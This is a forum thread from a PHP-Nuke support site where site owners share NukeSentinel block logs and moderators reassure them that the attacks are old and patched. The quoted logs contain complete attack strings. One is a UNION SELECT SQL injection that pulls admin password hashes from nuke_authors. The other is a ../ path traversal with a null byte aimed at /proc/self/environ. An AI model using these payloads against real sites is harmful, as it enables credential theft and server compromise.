| Author |
Message |
Doulos
Life Cycles Becoming CPU Cycles
Joined: Jun 06, 2005
Posts: 545
|
 Posted:
Fri Jan 19, 2007 11:49 pm |
 
|
Twice today I got this in my email (second time had different IP address):
| Quote: | Date & Time: 2007-01-19 18:26:32 CST GMT -0600
Blocked IP: 64.251.10.133
User ID: Anonymous (1)
Reason: Abuse-CLike
User Agent: libwww-perl/5.803
Query String: clanfga.com/modules.php?
name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Get String: clanfga.com/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Post String: clanfga.com/modules.php
Forwarded For: none
Client IP: none
Remote Address: 64.251.10.133
Remote Port: 34935
Request Method: GET
|
Is this something I need to worry about? Never had anyone blocked for Abuse-CLike before. |
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6373
Location: Vsetin, Czech Republic
|
| Posted:
Sat Jan 20, 2007 1:15 am |
|
The block occured because someone used a union attack in an atempt to retrieve the admins user/password. Sentinel will protect you from these types of attack. |
|
|
 
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Sun Jan 21, 2007 12:51 am |
|
Yep this is a known (old) vulnerablilty. Don't worry about it, if you are up-to-date with patches and Sentinel, you are fine. |
|
|
|
|
|
warren-the-ape
Worker
Joined: Nov 19, 2007
Posts: 196
Location: Netherlands
|
| Posted:
Sat Jan 12, 2008 2:40 pm |
|
Got this one today as well. Our 1st Clike attack 
This dude (IP:83.20.148.210, email; ) even registred on our website/forum..
| Code: | User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15
Query String: website.com/modules.php?name=Search
&type=comments
&query=not123exists
&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors
Get String: website.com/modules.php?name=Search
&type=comments
&query=not123exists
&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors
Post String: website.com/modules.php |
But are these attacks already blocked by a patched php-nuke version?
Cause when installing NS i remembered seeing some 'Union' code in some of the nuke files. |
|
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Sat Jan 12, 2008 11:18 pm |
|
Oh yea this is an old one. It is patched already |
|
|
|
|
|
grmm
New Member
Joined: Nov 15, 2008
Posts: 16
Location: Idaho, USA
|
| Posted:
Thu Jun 03, 2010 7:02 am |
|
Is this normal...
These seem to come in clusters of 4 or 5, always happen in the middle of the night, are occurring more and more frequently, and each IP is listed twice when I check my emails every morning.
Last night I had five, and the email notices look like this:
Blocked abuse for 94.198.96*
Blocked abuse for 94.198.96*
Blocked abuse for 209.188.90.*
Blocked abuse for 209.188.90.*
Blocked abuse for 174.123.39.*
Blocked abuse for 174.123.39.*
Blocked abuse for 67.18.167.*
Blocked abuse for 67.18.167.*
Blocked abuse for 74.200.76.*
Blocked abuse for 74.200.76.*
I did a search on the IP's in NukeSintenial and they are in fact all blocked now.
Thanks |
|
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6373
Location: Vsetin, Czech Republic
|
| Posted:
Thu Jun 03, 2010 12:31 pm |
|
Yes it's perfectly normal |
|
|
|
|
|
snype
Regular
Joined: Aug 12, 2008
Posts: 58
|
| Posted:
Thu Jun 03, 2010 12:54 pm |
|
5 thats not bad wait till you are getting 100s a week i opened my emails yesterday first time for a week and received over 500 of these in the end my email program had to close the connection to the host and i had to mass delete them then sync my emails again |
|
|
|
|
|
grmm
New Member
Joined: Nov 15, 2008
Posts: 16
Location: Idaho, USA
|
| Posted:
Thu Jun 03, 2010 1:57 pm |
|
Thanks Guardian, thanks Snype.
"100s a week"  , I kinda freaked out when they first started showing up, I feel better now. lol |
|
|
|
|
|
unicornio
Involved
Joined: Aug 13, 2009
Posts: 432
|
| Posted:
Wed Jun 09, 2010 1:12 am |
|
I am getting this
| Code: | Script Name: /modules.php
Query String: name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ
Get String: name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ\0 |
| Code: | Script Name: /modules.php
Query String: name=Video_Stream&d=4/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ
Get String: name=Video_Stream&d=4/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ\0 |
it looks like they are using the same code attack for any module. |
|
|
|
|
|
spasticdonkey
RavenNuke(tm) Development Team
Joined: Dec 02, 2006
Posts: 1364
Location: Texas, USA
|
| Posted:
Wed Jun 09, 2010 6:29 am |
|
yes that's some boneheads trying to attack the wrong gCalendar
|
|
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9133
Location: Arizona
|
| Posted:
Sat Jun 12, 2010 7:14 am |
|
School's out for many and so the Script Kiddies are back at it in force.  |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
